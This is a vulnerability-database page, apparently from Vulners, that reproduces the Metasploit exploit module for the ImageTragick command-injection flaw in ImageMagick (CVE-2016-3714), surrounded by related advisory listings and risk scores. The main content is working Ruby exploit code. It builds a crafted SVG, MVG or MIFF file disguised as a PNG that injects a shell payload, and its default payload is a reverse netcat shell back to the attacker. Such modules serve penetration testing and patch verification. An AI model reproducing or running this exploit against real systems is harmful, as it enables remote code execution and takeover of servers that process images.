Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ImageMagick 6.9.3-9 / 7.0.1-0 - 'ImageTragick' Delegate Arbitrary Command Execution (Metasploit)

🗓️ 09 May 2016 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 70 Views

ImageMagick Delegate Arbitrary Command Execution module for versions <= 7.0.1-0 and <= 6.9.3-9, allows arbitrary command injection via crafted file format detection

Related
Code
ReporterTitlePublishedViews
Family
FreeBSD		ImageMagick -- multiple vulnerabilities
3 May 201600:00
freebsd
0day.today		ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)
9 May 201600:00
zdt
0day.today		ImageMagick 6.9.3-9 / 7.0.1-0 - Multiple Vulnerabilities (ImageTragick)
4 May 201600:00
zdt
ALT Linux		Security fix for the ALT Linux 7 package ImageMagick version 6.8.4.10-alt3.M70P.1
20 May 201600:00
altlinux
GithubExploit		ethical-hacking-ctf
26 Apr 202602:17
githubexploit
GithubExploit		Exploit for Improper Input Validation in Imagemagick
17 Nov 202217:24
githubexploit
GithubExploit		Exploit for Improper Input Validation in Imagemagick
7 May 201608:21
githubexploit
Tenable Nessus		WordPress < 4.5.2 Multiple Vulnerabilities (ImageTragick)
7 Jul 201600:00
nessus
Tenable Nessus		Amazon Linux AMI : ImageMagick (ALAS-2016-699) (ImageTragick)
12 May 201600:00
nessus
Tenable Nessus		CentOS 6 / 7 : ImageMagick (CESA-2016:0726) (ImageTragick)
11 May 201600:00
nessus
Rows per page
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit

  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'ImageMagick Delegate Arbitrary Command Execution',
      'Description'     => %q{
        This module exploits a shell command injection in the way "delegates"
        (commands for converting files) are processed in ImageMagick versions
        <= 7.0.1-0 and <= 6.9.3-9 (legacy).

        Since ImageMagick uses file magic to detect file format, you can create
        a .png (for example) which is actually a crafted SVG (for example) that
        triggers the command injection.

        Tested on Linux, BSD, and OS X. You'll want to choose your payload
        carefully due to portability concerns. Use cmd/unix/generic if need be.
      },
      'Author'          => [
        'stewie',            # Vulnerability discovery
        'Nikolay Ermishkin', # Vulnerability discovery
        'wvu',               # Metasploit module
        'hdm'                # Metasploit module
      ],
      'References'      => [
        %w{CVE 2016-3714},
        %w{URL https://imagetragick.com/},
        %w{URL http://seclists.org/oss-sec/2016/q2/205},
        %w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},
        %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456}
      ],
      'DisclosureDate'  => 'May 3 2016',
      'License'         => MSF_LICENSE,
      'Platform'        => 'unix',
      'Arch'            => ARCH_CMD,
      'Privileged'      => false,
      'Payload'         => {
        'BadChars'      => "\x22\x27\x5c", # ", ', and \
        'Compat'        => {
          'PayloadType' => 'cmd cmd_bash',
          'RequiredCmd' => 'generic netcat bash-tcp'
        }
      },
      'Targets'         => [
        ['SVG file',  template: 'msf.svg'], # convert msf.png msf.svg
        ['MVG file',  template: 'msf.mvg'], # convert msf.svg msf.mvg
        ['MIFF file', template: 'msf.miff'] # convert -label "" msf.svg msf.miff
      ],
      'DefaultTarget'   => 0,
      'DefaultOptions'  => {
        'PAYLOAD'               => 'cmd/unix/reverse_netcat',
        'LHOST'                 => Rex::Socket.source_address,
        'DisablePayloadHandler' => false,
        'WfsDelay'              => 9001
      }
    ))

    register_options([
      OptString.new('FILENAME', [true, 'Output file', 'msf.png'])
    ])
  end

  def exploit
    if target.name == 'SVG file'
      p = Rex::Text.html_encode(payload.encoded)
    else
      p = payload.encoded
    end

    file_create(template.sub('echo vulnerable', p))
  end

  def template
    File.read(File.join(
      Msf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template]
    ))
  end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 May 2016 00:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.18.4
CVSS 210
EPSS0.93622
SSVC
imagemagickdelegatecommand executioncve-2016-3714shellinjectionlinuxbsdos xmetasploitpayloadsvgmvgmiff
70